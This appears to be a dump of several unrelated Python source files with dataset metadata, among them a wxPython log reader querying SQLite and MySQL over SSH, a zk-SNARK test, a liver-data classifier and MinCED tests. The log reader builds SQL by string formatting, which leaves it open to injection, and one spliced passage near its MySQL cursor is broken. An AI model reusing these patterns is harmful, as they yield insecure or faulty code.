fitcp_message = dict(zip(sql_fitcp_names, sql_fitcp_data[0]))\n                            fitcp_html = \"<html><body><b>Принято из МПС</b><br><br>{}</body></html>\".format('<br>'.join('{}: {}'.format(key, val) for key, val in sorted(fitcp_message.items()) if val))\n                            self.fitcpTxt.SetPage(fitcp_html, \"\")\n                        sql_frntn_names, sql_frntn_data = search_sqlite(env['database'] + \".sqlite\",\n                                                                        \"\"\"SELECT * from {} WHERE `037`='{}'\"\"\".format(\n                                                                            'frntn_messages', mes_rrn))\n                        if sql_frntn_data:\n                            frntn_message = dict(zip(sql_frntn_names, sql_frntn_data[0]))\n                            frntn_html = \"<html><body><b>Отправлено в МПС</b><br><br>{}</body></html>\".format('<br>'.join('{}: {}'.format(key, val) for key, val in sorted(frntn_message.items()) if val))\n                self.frntnTxt.SetPage(frntn_html, \"\")\n        except Exception as exc:\n            wx.MessageBox(message='{}'.format(str(exc)),\n                          caption='Error retriving from cache',\n                          style=wx.OK | wx.ICON_ERROR)\n\n    # ----------------------------------------------------------------------\n    def update_display(self):\n        \"\"\"\n        Update the RSS feed display\n        \"\"\"\n        self.almOlv.SetColumns([\n            ColumnDefn(\"Date\", \"left\", 150, \"date\"),\n            ColumnDefn(\"Card\", \"left\", 100, \"card_number\"),\n            ColumnDefn(\"ExternalID\", \"left\", 100, \"external_id\"),\n            ColumnDefn(\"RRN\", \"left\", 100, \"rrn\"),\n            ColumnDefn(\"Stan\", \"left\", 100, \"stan\"),\n            ColumnDefn(\"RespCode\", \"left\", 100, \"resp_code\"),\n        ])\n        self.almOlv.SetObjects(self.data)\n\n\ndef server_file_process(env, filename):\n    busyDlg = wx.BusyInfo(\"Downloading {}\".format(filename))\n    ret_file = get_file(filename, env['hostname'], env['username'], env['password'], env['folder'])\n    busyDlg = None\n    if ret_file:\n        if os.path.exists(ret_file):\n            busyDlg = wx.BusyInfo(\"Processing {}\".format(filename))\n            try:\n                (all_outbound_messages, all_inbound_messages, all_fitcp, all_frntn) = run_mp(ret_file)\n            except Exception as exc:\n                wx.MessageBox(message='Error {} processing {}'.format(str(exc), ret_file),\n                              caption='Processing error',\n                              style=wx.OK | wx.ICON_ERROR)\n\n            busyDlg = wx.BusyInfo(\"Caching {}\".format(filename))\n            try:\n                cache_to_db(env, all_outbound_messages, all_inbound_messages, all_fitcp, all_frntn, filename)\n            except Exception as exc:\n                wx.MessageBox(message='Error {} caching {}'.format(str(exc), ret_file),\n                              caption='Caching error',\n                              style=wx.OK | wx.ICON_ERROR)\n            busyDlg = None\n        else:\n            wx.MessageBox(message='File not found {}'.format(ret_file),\n                          caption='Error during downloading',\n                          style=wx.OK | wx.ICON_ERROR)\n    else:\n        wx.MessageBox(message='File not exists',\n                      caption='Error during downloading',\n                      style=wx.OK | wx.ICON_ERROR)\n\n\n\ndef get_from_mysql(hostname, ssh_login, ssh_password, db_user, db_password, database, query):\n    _local_mysql_port = 3309\n    #random.randint(1024,65536)\n    #print (_local_mysql_port)\n    _local_bind_address = '0.0.0.0'\n    _remote_bind_address = '127.0.0.1'\n    _remote_mysql_port = 3306\n    # _base_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, files.filename, ST.resp_code, ST.direction from small_table as ST join files on files.ID=ST.filename where ST.external_id=(select external_id from small_table where {} limit 1)\"\"\".format(query)\n    _base_select = \"\"\"select ST.date, ST.external_id, ST.stan, ST.rrn, ST.card_number, files.filename, ST.resp_code, ST.direction from small_table as ST join files on files.ID=ST.filename where {} LIMIT 100\"\"\".format(\n        query)\n\n    #sshtunnel.SSH_TIMEOUT = 10.0\n    #sshtunnel.TUNNEL_TIMEOUT = 10.0\n    DEFAULT_LOGLEVEL = 'DEBUG'\n\n    try:\n        with sshtunnel.SSHTunnelForwarder(\n                (hostname),\n                ssh_username=ssh_login,\n                ssh_password=ssh_password,\n                remote_bind_address=(_remote_bind_address, _remote_mysql_port)\n                #debug_level='DEBUG'\n                #local_bind_address=(_local_bind_address, _local_mysql_port)\n        ) as tunnel:\n            try:\n                connection = None\n                connection = mariadb.connect(\n                    connect_timeout=60,\n                    user=db_user,\n                    password=db_password,\n                    host=_remote_bind_address,\n                    database=database,\n                    compress=False,\n                    pool_size=1,\n                    pool_reset_session=False,\n                    port=tunnel.local_bind_port\n                )\n                if connection.is_connected():\n                    coursor = connection.cursor()
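\n                    # The query runs against MySQL on 127.0.0.1 through the SSH\n                    # tunnel, using the forwarded local port tunnel.local_bind_port.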
{}\".format(_base_select))\n coursor.execute(_base_select)\n if coursor.with_rows:\n sql_data = coursor.fetchall()\n return sql_data\n else:\n return None\n else:\n wx.MessageBox(message=\"Error fetching from mysql\",\n caption='Error creating tunnel',\n style=wx.OK | wx.ICON_ERROR)\n return None\n except Exception as exc:\n print(\"MySQL connection error {}\".format(str(exc)))\n raise\n finally:\n connection.close()\n except sshtunnel.BaseSSHTunnelForwarderError as exc:\n print(\"SshTunnel Error {}\".format(str(exc)))\n raise\n finally:\n tunnel.close()\n\n\n########################################################################\nclass logFrame(wx.Frame):\n \"\"\"\"\"\"\n\n # ----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title=\"Online Log Reader\", size=(1600, 900))\n panel = logPanel(self)\n self.Show()\n\n\n# ----------------------------------------------------------------------\nif __name__ == \"__main__\":\n multiprocessing.freeze_support()\n app = wx.App(False)\n frame = logFrame()\n app.MainLoop()\n","sub_path":"gx_log_reader.py","file_name":"gx_log_reader.py","file_ext":"py","file_size_in_byte":28652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"385995412","text":"import zk_snark as zk\n\npv = zk.prover(97)\nAT, BT, CT, HT = pv.QAP()\n\nvf = zk.verifier(4,3,4,5,6)#t_0, k_a, k_b, k_c, b\npublic_1_a, public_1_b, public_1_c, public_1_g= vf.gen_pub_1()\n\n\n\n#1\np_n_a, p_n_b, p_n_c, p_n_h = pv.get_proof_1(public_1_a, public_1_b, public_1_c, public_1_g)\nresult_1 = vf.verify_1(AT, BT, CT, HT, p_n_a, p_n_b, p_n_c, p_n_h)\nprint(\"result_1 = %s\", result_1)\n\npublic_2_a, public_2_b, public_2_c = vf.gen_pub_2()\n#2\np_n_a_2, p_n_b_2, p_n_c_2 = pv.get_proof_2(public_2_a, public_2_b, public_2_c)\nresult_2 = vf.verify_2(p_n_a_2, p_n_b_2, p_n_c_2)\nprint(\"result_2 = %s\", result_2)\n\npublic_3 = vf.gen_pub_3()\n#3\np_n = pv.get_proof_3(public_3)\nresult_3 = vf.verify_3(p_n)\nprint(\"result_3 = %s\", result_3)","sub_path":"Security/security_8-master/security_8/test_zk_snark.py","file_name":"test_zk_snark.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"120937677","text":"import db.core as db\r\ndef run():\r\n nombre = input(\"Nombre: \")\r\n apellido = input(\"Apelllido: \")\r\n telefono = input(\"Teléfono: \")\r\n if (telefono.isdigit() == False and telefono[0] != '+'):\r\n print(\"¡Error, el número de teléfono solo puede contener números!\")\r\n return\r\n\r\n contactos = db.read()\r\n contactos.append({\r\n 'nombre': nombre,\r\n 'apellido': apellido,\r\n 'telefono': int(telefono)\r\n })\r\n\r\n db.save(contactos)\r\n print('[+] Contacto añadido')\r\n","sub_path":"sections/add_contact.py","file_name":"add_contact.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"349513775","text":"from itertools import chain\n\n\ndef ex1(l: list) -> list:\n return sorted(l, key=lambda x: x[1])\n\n\ndef ex2(l: list, s: str) -> bool:\n return s in [i[1] for i in l]\n\n\noperations = {\"+\": lambda a, b: a + b,\n \"*\": lambda a, b: a * b,\n \"/\": lambda a, b: a / b,\n \"%\": lambda a, b: a % b\n }\n\n\ndef ex3(op, a, b):\n return operations['op'](a, b)\n\n\ndef ex5(*params):\n d = {}\n for i in params:\n for key, value in i.items():\n if key in d:\n 
                d[key] = [value] + d[key]\n            else:\n                d[key] = [value]\n    return dict(map(lambda k: (k[0], k[1][0]) if len(k[1]) == 1 else k, d.items()))\n\n\ndef ex6(d: dict, sep='-', h=''):\n    for key, value in d.items():\n        if type(value) != type({}):\n            print(f'{h}{key}{sep}{value}')\n        else:\n            ex6(value, h=f\"{h}{key}{sep}\")\n\n\na = {\n    'a': 1,\n    'b': {\n        'c': 3,\n        'd': {\n            'e': 5,\n            'f': 6\n        }\n    }\n}\nex6(a)\n","sub_path":"python/caz1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"10084721","text":"import itertools\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas\nfrom scipy import stats\nfrom scipy.stats import pearsonr\n\n\ndef plot_bargraph(title, category, values, x_label, y_label):\n    # this is for plotting purpose\n    index = np.arange(len(category))\n    plt.figure(1, figsize=[6, 3.5], dpi=120, facecolor='w', edgecolor='black')\n    plt.bar(index, values)\n    plt.xlabel(x_label, fontsize=10)\n    plt.ylabel(y_label, fontsize=10)\n    plt.xticks(index, category, fontsize=10, rotation=90)\n    plt.title(title)\n    plt.show()\n\n\ndef plot_functiongraph(title, x, y, label_x, label_y, label_legend):\n    plt.plot(x, y, label=label_legend)\n    # naming the x axis\n    plt.xlabel(label_x)\n    # naming the y axis\n    plt.ylabel(label_y)\n    # giving a title to my graph\n    plt.title(title)\n\n    # show a legend on the plot\n    plt.legend()\n\n    # function to show the plot\n    plt.show()\n    return\n\n\ndef plot_boxnotch_univariateanalysis(data, features_name):\n    fig2 = plt.figure(2, figsize=[10, 4.5], dpi=95, facecolor='w', edgecolor='black')\n    numero_features = len(data)\n    d = []\n    for f in range(0, numero_features, 1):\n        d.append(list(data[f]))\n    plt.boxplot(d, notch=True)\n    plt.title(f)\n    fig2.show()\n    return\n\n\ndef plot_correlationbtw2V(title, data1, data2, righe, colonne, indice, cm):\n    plt.subplot(righe, colonne, indice)\n    plt.plot(data1, data2, cm)\n    # plt.tight_layout()\n    plt.subplots_adjust(left=-0.2, right=0.8, top=0.8, bottom=-0.5)\n    plt.title(title)\n    return\n\n\ndef distinct(lista):\n    distinct_lista = []\n    for x in lista:\n        if x not in distinct_lista:\n            distinct_lista.append(x)\n    return distinct_lista\n\n\ndef get_dict_fromOutcome(y):\n    cls = distinct(y)\n    cls.sort()\n    d = {}\n    for e in cls:\n        d[e] = 0\n    for e in y:\n        d[e] = d[e] + 1\n    return d\n\n\n# Usually useful with CATEGORICAL FEATURES => Univariate Analysis\ndef categorical_plot(title, y, x_label, y_label):\n    d = get_dict_fromOutcome(y)\n    axisx = []\n    axisy = []\n    for elm in d.keys():\n        axisx.append(elm)\n    for elm in d.values():\n        axisy.append(elm)\n    plot_bargraph(title, axisx, axisy, x_label, y_label)\n    return\n\n\ndef info_univariate(data, features_name):\n    d = np.array(data)\n    data_t = np.transpose(d)\n    for f in range(0, len(data_t), 1):\n        ds = sorted(data_t[f])\n        moda = stats.mode(ds)\n        # print('Feature: {}:\\nMAX: --> {}\\nMIN: --> {}\\nAVG: --> {}\\nMODE: --> V:{} --> {}\\nMed --> {}\\n'.format(\n        #     features_name[f], np.max(data_t[f]),\n        #     np.min(data_t[f]),\n        #     round(np.mean(data_t[f]), 1),\n        #     moda[0], moda[1],\n        #     np.median(ds)))\n    plot_boxnotch_univariateanalysis(data_t, features_name)\n    return\n\n\ndef info_bivariate(data, features_name):\n    thre = 0.4\n    d = np.array(data)\n    data_t = np.transpose(d)\n    el = np.arange(0, len(data_t))\n    combo_index = list(itertools.product(el, repeat=2))\n    fig3 = plt.figure(1, figsize=[100, 70], dpi=30, facecolor='w', edgecolor='black')\n    i = 1\n    for e in 
combo_index:\n ind1 = e.__getitem__(0)\n ind2 = e.__getitem__(1)\n c, t = pearsonr(data_t[ind1], data_t[ind2])\n\n titolo = '\\n{} - {}\\nP: --> {}'.format(features_name[ind1], features_name[ind2], round(c, 2))\n print(titolo)\n # if c < thre and c > -thre:\n # plot_correlationbtw2V(titolo, data_t[ind1], data_t[ind2], len(data_t), len(data_t), i, 'r*')\n # else:\n # plot_correlationbtw2V(titolo, data_t[ind1], data_t[ind2], len(data_t), len(data_t), i, 'g.')\n # i = i + 1\n # # fig3.show()\n # plt.show()\n return\n\n\ndataframe = pandas.read_csv(\"../crypto_preprocessing/step5_horizontal/horizontal.csv\", delimiter=',',\n header=0)\n# data := lista di dati (ciascuna entry è a sua volta una lista)\ndata = dataframe.values\n\n# X := lista di dati (ciascuna entry è l'insieme delle sole features di ciascuna entry)\na = dataframe.drop(\n columns=[\"DateTime\", 'Symbol_1', 'Symbol_2', 'Symbol_3', 'Symbol_4', 'Symbol_5', 'Symbol_6', 'Symbol_7',\n 'Symbol_8'])\nprint(a)\ndd = a.values\ncol_name = a.columns.values\nprint(np.shape(data), \"\\n\", col_name)\ninfo_bivariate(dd, col_name)\n","sub_path":"crypto_runner/features_exploration.py","file_name":"features_exploration.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"608817387","text":"\r\nimport os, glob\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport numpy as np\r\nfrom pathlib import Path\r\n\r\ndef append_images(images, direction='horizontal',\r\n bg_color=(255,255,255), aligment='center'):\r\n \"\"\"\r\n Appends images in horizontal/vertical direction.\r\n\r\n Args:\r\n images: List of PIL images\r\n direction: direction of concatenation, 'horizontal' or 'vertical'\r\n bg_color: Background color (default: white)\r\n aligment: alignment mode if images need padding;\r\n 'left', 'right', 'top', 'bottom', or 'center'\r\n\r\n Returns:\r\n Concatenated image as a new PIL image object.\r\n \"\"\"\r\n widths, heights = zip(*(i.size for i in images))\r\n\r\n if direction=='horizontal':\r\n new_width = sum(widths)\r\n new_height = max(heights)\r\n else:\r\n new_width = max(widths)\r\n new_height = sum(heights)\r\n\r\n margin = 50 # margin between images\r\n offset = margin # offset from Top-Left\r\n \r\n\r\n if direction=='horizontal':\r\n new_width += (len(images) + 1)*margin\r\n else:\r\n new_height += (len(images) + 1)*margin\r\n\r\n new_im = Image.new('RGB', (new_width, new_height), color=bg_color)\r\n for im in images:\r\n if direction=='horizontal':\r\n y = margin\r\n if aligment == 'center':\r\n y = int((new_height - im.size[1])/2)\r\n elif aligment == 'bottom':\r\n y = new_height - im.size[1]\r\n new_im.paste(im, (offset, y))\r\n offset += im.size[0] \r\n else:\r\n x = margin\r\n if aligment == 'center':\r\n x = int((new_width - im.size[0])/2)\r\n elif aligment == 'right':\r\n x = new_width - im.size[0]\r\n new_im.paste(im, (x, offset))\r\n offset += im.size[1] # - 2*margin\r\n offset += margin\r\n # print(\"offset: {}\".format(offset))\r\n\r\n return new_im\r\n\r\ndef img_add_txt(file):\r\n blank_image = Image.open(file)\r\n # print(np.array(blank_image).shape)\r\n w = np.array(blank_image).shape[0]\r\n h = np.array(blank_image).shape[1]\r\n img_draw = ImageDraw.Draw(blank_image)\r\n\r\n font = ImageFont.truetype(\"calibrib.ttf\", 500) # timesbd.ttf\r\n txt = os.path.split(file)[-1].split('_')[0]\r\n img_draw.text((np.floor(h*0.9), np.floor(w*0.9)), f\"{txt}\", fill='white', font=font)\r\n # blank_image.save(savePath / 
f\"{os.path.split(file)[-1]}\")\r\n return blank_image\r\n\r\nif __name__ == \"__main__\":\r\n\r\n fireName = \"Sydney\"\r\n dataPath = Path(f\"E:\\Wildfire_Events_2020\\Results_Analysis\\{fireName}\")\r\n\r\n savePath = dataPath / \"imgArray\"\r\n if not os.path.exists(savePath):\r\n os.mkdir(savePath)\r\n\r\n ratio = 0.2 # scale ratio\r\n saveName = 'imgArray_{}'.format(ratio)\r\n\r\n print(\"\\n\\n===================> Start to Arrange Images Into Image Array <====================\")\r\n\r\n\r\n rowList = []\r\n fileNameList = glob.glob(str(dataPath / f\"*.png\"))\r\n print(len(fileNameList))\r\n for i in range(0, 12, 4):\r\n # print(f\"{i}-{i+4}\") \r\n sub_fileNameList = fileNameList[i:i+4]\r\n # print(f\"{i}-{i+4}: {sub_fileNameList}\") \r\n \r\n imageList = list(map(img_add_txt, sub_fileNameList))\r\n # imageList = list(map(Image.open, fileNameList))\r\n\r\n row = append_images(imageList, direction='horizontal')\r\n rowList.append(row)\r\n\r\n imgArray = append_images(rowList, direction='vertical')\r\n w, h = imgArray.size\r\n\r\n imgArray_scaled = imgArray.resize((int(np.floor(w*ratio)), int(np.floor(h*ratio))))\r\n\r\n print(\"----------------------------------------------------------------------------------\")\r\n print(\"savePath: {}\".format(savePath))\r\n imgArray_scaled.save(savePath / f\"{fireName}_imgArray_{ratio}.png\")\r\n imgArray_scaled.save(savePath / f\"{fireName}_imgArray_{ratio}.pdf\")\r\n print(\"===========================> Finished and be Saved! <=============================\")\r\n\r\n\r\n\r\n\r\n","sub_path":"gen_imgArr_fig_from_multiple_images.py","file_name":"gen_imgArr_fig_from_multiple_images.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"487200913","text":"# coding: UTF-8\n\nimport math\nimport cmath\nimport random\n\nimport scipy.linalg as slinalg\nimport numpy.linalg as linalg\nimport numpy as np\n\nimport lu\n\n#------------------------------------\n# function definition\n#------------------------------------\ndef direct_solver(a,b):\n return slinalg.solve(a,b)\ndef direct_lu_solver(a,b):\n lup = slinalg.lu_factor(a)\n return slinalg.lu_solve(lup,b)\n\ndef plu(a,b):\n (size,_) = a.shape\n (lu,p) = slinalg.lu_factor(a)\n l = np.zeros((size,size), dtype=np.complex128)\n u = np.zeros((size,size), dtype=np.complex128)\n for i in range(0,size):\n l[i,i] = 1\n for j in range(0,size):\n if i>j:\n l[i,j] = lu[i,j]\n else:\n u[i,j] = lu[i,j]\n c = np.zeros(size, dtype=np.complex128)\n for i in range(0,size):\n c[i] = b[i]\n for i in range(0,size):\n tmp = c[i]\n c[i] = c[p[i]]\n c[p[i]] = tmp\n return (l, u, c)\n\ndef lu_solver(a,b):\n\t(l,u,c) = plu(a,b)\n\ty = lu.l_step(l,c)\n\tx = lu.u_step(u,y)\n\treturn x\n\n\n#------------------------------------\n# test code\n#------------------------------------\n\n","sub_path":"lib_lu_solve.py","file_name":"lib_lu_solve.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"499529291","text":"#!/usr/bin/env python3\r\nimport os\r\nimport ctypes\r\nimport sys\r\n\r\ndef recursive_delete(dir):\r\n\r\n os.chdir(dir)\r\n curdir = os.getcwd()\r\n subdir = os.listdir(curdir)\r\n for i in range(len(subdir)):\r\n fullname = os.path.join(curdir, subdir[i])\r\n if os.path.isdir(fullname):\r\n recursive_delete(fullname)\r\n if len(os.listdir(fullname)) == 0:\r\n os.rmdir(fullname)\r\n else:\r\n print(\"File isn't empty\")\r\n else:\r\n 
os.remove(fullname)\r\n name = os.path.join(os.getcwd(), os.pardir)\r\n os.chdir(name)\r\n\r\ndef delete_directory():\r\n subdir = os.listdir(curdir)\r\n print(\"Which directory would you like to delete?\")\r\n for i in range(len(subdir)):\r\n print(str(i) + \": \" + subdir[i])\r\n toDelete = input()\r\n deletedir = \"\"\r\n for i in range(len(subdir)):\r\n if int(toDelete) == i or toDelete == subdir[i]:\r\n print(i)\r\n deletedir = os.path.join(curdir, subdir[i])\r\n\r\n print(\"Are you sure you want to delte \\\"\" + deletedir + \"\\\"? (you will be deleting all directories and files within this directory) y/n\")\r\n confirmation = input()\r\n if confirmation == \"y\" or confirmation == \"Y\":\r\n recursive_delete(deletedir)\r\n\r\n os.rmdir(deletedir)\r\n else:\r\n print(\"Will not delete any folders\")\r\n return\r\n\r\n\r\ndef is_admin():\r\n try:\r\n return ctypes.windll.shell32.IsUserAnAdmin()\r\n except:\r\n return False\r\n","sub_path":"delete_directory.py","file_name":"delete_directory.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"87663657","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem203.py\nDate started : 2013-02-06\nDate solved : 2013-02-06\nRun Time :\n\n\nThe binomial coefficients can be arranged in triangular form, Pascal's\n triangle, like this:\n\nrow\n1 1\n2 1 1\n3 1 2 1\n4 1 3 3 1\n5 1 4 6 4 1\n6 1 5 10 10 5 1\n7 1 6 15 20 15 6 1\n8 1 7 21 35 35 21 7 1\n .........\nIt can be seen that the first eight rows of Pascal's triangle\n contain twelve distinct numbers:\n\n 1, 2, 3, 4, 5, 6, 7, 10, 15, 20, 21 and 35.\n\nA positive integer n is called squarefree if no square of a prime\n divides n. Of the twelve distinct numbers in the first eight rows\n of Pascal's triangle, all except 4 and 20 are squarefree. 
The sum\n of the distinct squarefree numbers in the first eight rows is 105.\n\nFind the sum of the distinct squarefree numbers in the first 51 rows of\n Pascal's triangle.\n\n\"\"\"\n\nimport project_euler\nimport itertools\nimport project_euler.number_theory\nimport project_euler.primes\n\nPROBLEM_NUMBER = 203\nSOLVED = 1\n\n\ndef isSquareFree(n, sqp):\n return len([i for i in itertools.filterfalse(lambda div: n % div, sqp)]) == 0\n\n\ndef problem203(input_=None):\n lastRow = 51\n seen = set()\n primes = project_euler.primes.get2max(lastRow ** .5)\n squarePrimes = set(map(lambda p: p ** 2, primes))\n s = 0\n for n in range(1, lastRow):\n for r in range(n // 2 + 1):\n coeff = project_euler.number_theory.choose(n, r)\n if coeff not in seen:\n seen.add(coeff)\n s += coeff * isSquareFree(coeff, squarePrimes)\n return s\n\n\ndef run():\n print(project_euler.print_timing(problem203))\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"problems/Problem203.py","file_name":"Problem203.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"468305016","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\nimport seaborn as sns\n\ndef feature_shrink_or_zoom(x_train,x_test):\n sc = StandardScaler()\n sc.fit(x_train)\n x_train_std = sc.transform(x_train)\n x_test_std = sc.transform(x_test)\n return x_train_std, x_test_std\n\ndef logistic_reg_train(x_train_std, y_train):\n lr = LogisticRegression(solver='liblinear')\n lr.fit(x_train_std, y_train)\n return lr\n\ndef get_logistic_reg_predict_probability(x_test_std, lr):\n return lr.predict_proba(x_test_std)\n\ndef bayes_inference_train(x_train_std, y_train):\n bnb = BernoulliNB()\n bnb.fit(x_train_std, y_train)\n return bnb\n\ndef get_correct_rate(classfication, x_test_std, y_test):\n classfication.predict(x_test_std)\n error = 0\n num_of_data = 0\n for i, v in enumerate(classfication.predict(x_test_std)):\n num_of_data += 1\n if v != y_test.iloc[i,]:\n error += 1\n correct_rate = 1 - (error/num_of_data)\n return correct_rate\n\ndef cut_train_test_data(x, y):\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=0)\n return x_train, x_test, y_train, y_test\n\ndef get_GOT_GPT_ratio(GOT, GPT):\n GOT_GPT_ratio = GOT/GPT\n return GOT_GPT_ratio\n\ndef data_correlation(Selector,GOT_GPT_ratio):\n GOT_GPT_data_correlation = GOT_GPT_ratio.corr(Selector)\n return GOT_GPT_data_correlation\n\ndef run_data(x,y):\n x_train, x_test, y_train, y_test = cut_train_test_data(x, y)\n x_train_std, x_test_std = feature_shrink_or_zoom(x_train, x_test)\n lr = logistic_reg_train(x_train_std, y_train)\n lr_correct_rate = get_correct_rate(lr, x_test_std, y_test)\n bnb = bayes_inference_train(x_train_std, y_train)\n bnb_correct_rate = get_correct_rate(bnb, x_test_std, y_test)\n return lr, lr_correct_rate,bnb, bnb_correct_rate\n\ndef get_mean_squared_log_error(reg_kind,x, y):\n x_train, x_test, y_train, y_test = cut_train_test_data(x, y)\n y_pred = reg_kind.predict(x_test)\n mean_squared_log_error = metrics.mean_squared_log_error(y_test,y_pred)\n return mean_squared_log_error\n\ndef main():\n data = pd.read_csv('liver.csv')\n x, y = data.iloc[0:, 0:6], data.iloc[0:, 6]\n 
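# first six columns are the liver features; the last column is the class label\n    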
lr, lr_correct_rate, bnb, bnb_correct_rate = run_data(x,y)\n    lr_msle = get_mean_squared_log_error(lr, x, y)\n    bnb_msle = get_mean_squared_log_error(bnb, x, y)\n    print('lr_correct_rate:', lr_correct_rate)\n    print('bnb_correct_rate:', bnb_correct_rate)\n    print('lr_mean_squared_log_error:', lr_msle)\n    print('bnb_mean_squared_log_error:', bnb_msle)\n\n\n    GOT = data.iloc[0:, 3]\n    GPT = data.iloc[0:, 2]\n    GOT_GPT_ratio = get_GOT_GPT_ratio(GOT, GPT)\n    GPT_GOT_ratio = get_GOT_GPT_ratio(GPT, GOT)\n    data.iloc[0:, 3] = GOT_GPT_ratio\n    data.iloc[0:, 2] = GPT_GOT_ratio\n    x_changed = data.iloc[0:,0:6]\n    x_changed_only_GOT_GPT_ratio = data.iloc[0:,[0, 1, 3, 4, 5]]\n    x_changed_only_GPT_GOT_ratio = data.iloc[0:, [0, 1, 2, 4, 5]]\n    _, lr_correct_rate_changed, _, bnb_correct_rate_changed = run_data(x_changed, y)\n    print('lr_correct_rate_changed:', lr_correct_rate_changed)\n    print('bnb_correct_rate_changed:', bnb_correct_rate_changed)\n    _, lr_correct_rate_changed, _, bnb_correct_rate_changed = run_data(x_changed_only_GOT_GPT_ratio, y)\n    print('mean square error:', get_mean_squared_log_error(lr, x, y))\n\n    print('lr_correct_rate_changed_GOT_GPT_ratio:', lr_correct_rate_changed)\n    print('bnb_correct_rate_changed_GPT_GOT_ratio:', bnb_correct_rate_changed)\n    _, lr_correct_rate_changed, _, bnb_correct_rate_changed = run_data(x_changed_only_GPT_GOT_ratio, y)\n    print('lr_correct_rate_changed:', lr_correct_rate_changed)\n    print('bnb_correct_rate_changed:', bnb_correct_rate_changed)\n    GPT_GOT_ratio_corrwith_selector = data_correlation(y, GPT_GOT_ratio)\n    GOT_GPT_ratio_corrwith_selector = data_correlation(y, GOT_GPT_ratio)\n    GPT_corrwith_selector = data_correlation(y,GPT)\n    GOT_corrwith_selector = data_correlation(y,GOT)\n    print('GPT_GOT_ratio_corrwith_selector:', GPT_GOT_ratio_corrwith_selector)\n    print('GOT_GPT_ratio_corrwith_selector:', GOT_GPT_ratio_corrwith_selector)\n    print('GPT_corrwith_selector:',GPT_corrwith_selector)\n    print('GOT_corrwith_selector:',GOT_corrwith_selector)\n\n\nmain()","sub_path":"logistic_selector.py","file_name":"logistic_selector.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"460670129","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2015--, micronota development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom tempfile import mkdtemp\nfrom os import getcwd\nfrom shutil import rmtree\nfrom os.path import join\nfrom unittest import TestCase, main\nfrom functools import partial\nfrom skbio.util import get_data_path\nfrom burrito.util import ApplicationError\n\nfrom micronota.bfillings.minced import MinCED, predict_crispr\n\n\nclass MinCEDTests(TestCase):\n    def setUp(self):\n        self.temp_dir = mkdtemp()\n        self.get_minced_path = partial(\n            get_data_path, subfolder=join('data', 'minced'))\n\n        # taken from MinCED test files\n        self.positive_fps = list(map(self.get_minced_path,\n                                     ['Aquifex_aeolicus_VF5.fna',\n                                      'Aquifex_aeolicus_VF5.fna',\n                                      'Aquifex_aeolicus_VF5.fna']))\n        # 'empty' file raises JAVA (minced) error\n        self.negative_fps = list(map(get_data_path, [\n            'whitespace_only',\n            'empty']))\n        self.positive_params = [\n            {'-searchWL': '8'},\n            {'-searchWL': '8', '-minNR': '3'},\n            {}]\n        self.positive_flags = [\n            {'gff': True, 'gffFull': False, 'spacers': False},\n            
{'gffFull': True, 'gff': False, 'spacers': False},\n {'gff': True, 'spacers': True, 'gffFull': False}]\n self.positive_prefix = 'Aquifex_aeolicus_VF5'\n\n def test_base_command(self):\n c = MinCED()\n self.assertEqual(\n c.BaseCommand,\n 'cd \"%s/\"; %s' % (getcwd(), c._command))\n\n def test_predict_crispr_wrong_input(self):\n for fp in self.negative_fps:\n with self.assertRaisesRegex(\n ApplicationError,\n r'Error constructing CommandLineAppResult.'):\n predict_crispr(fp, self.temp_dir, 'foo')\n\n def test_predict_crispr(self):\n for fp, params, flags in zip(self.positive_fps, self.positive_params,\n self.positive_flags):\n prefix = self.positive_prefix\n res = predict_crispr(fp, self.temp_dir,\n prefix,\n gff=flags['gff'],\n gffFull=flags['gffFull'],\n spac=flags['spacers'], params=params)\n self.assertEqual(res['ExitStatus'], 0)\n if flags['gff']:\n suffix = 'gff'\n elif flags['gffFull']:\n suffix = 'gffFull'\n else:\n suffix = 'crisprs'\n fp = self.get_minced_path('.'.join([prefix, suffix]))\n with open(fp) as f:\n self.assertEqual(\n # skip comment lines as some contain runtime info\n [i for i in f.readlines()\n if not i.startswith('Time')],\n [j for j in res['output'].readlines()\n if not j.startswith('Time')])\n # SPACERS flag produces an *additional* OUT_spacers.fa file\n # other flags produce OUT.FLAG outputs\n if flags['spacers']:\n suffix = 'spacers.fa'\n fp = 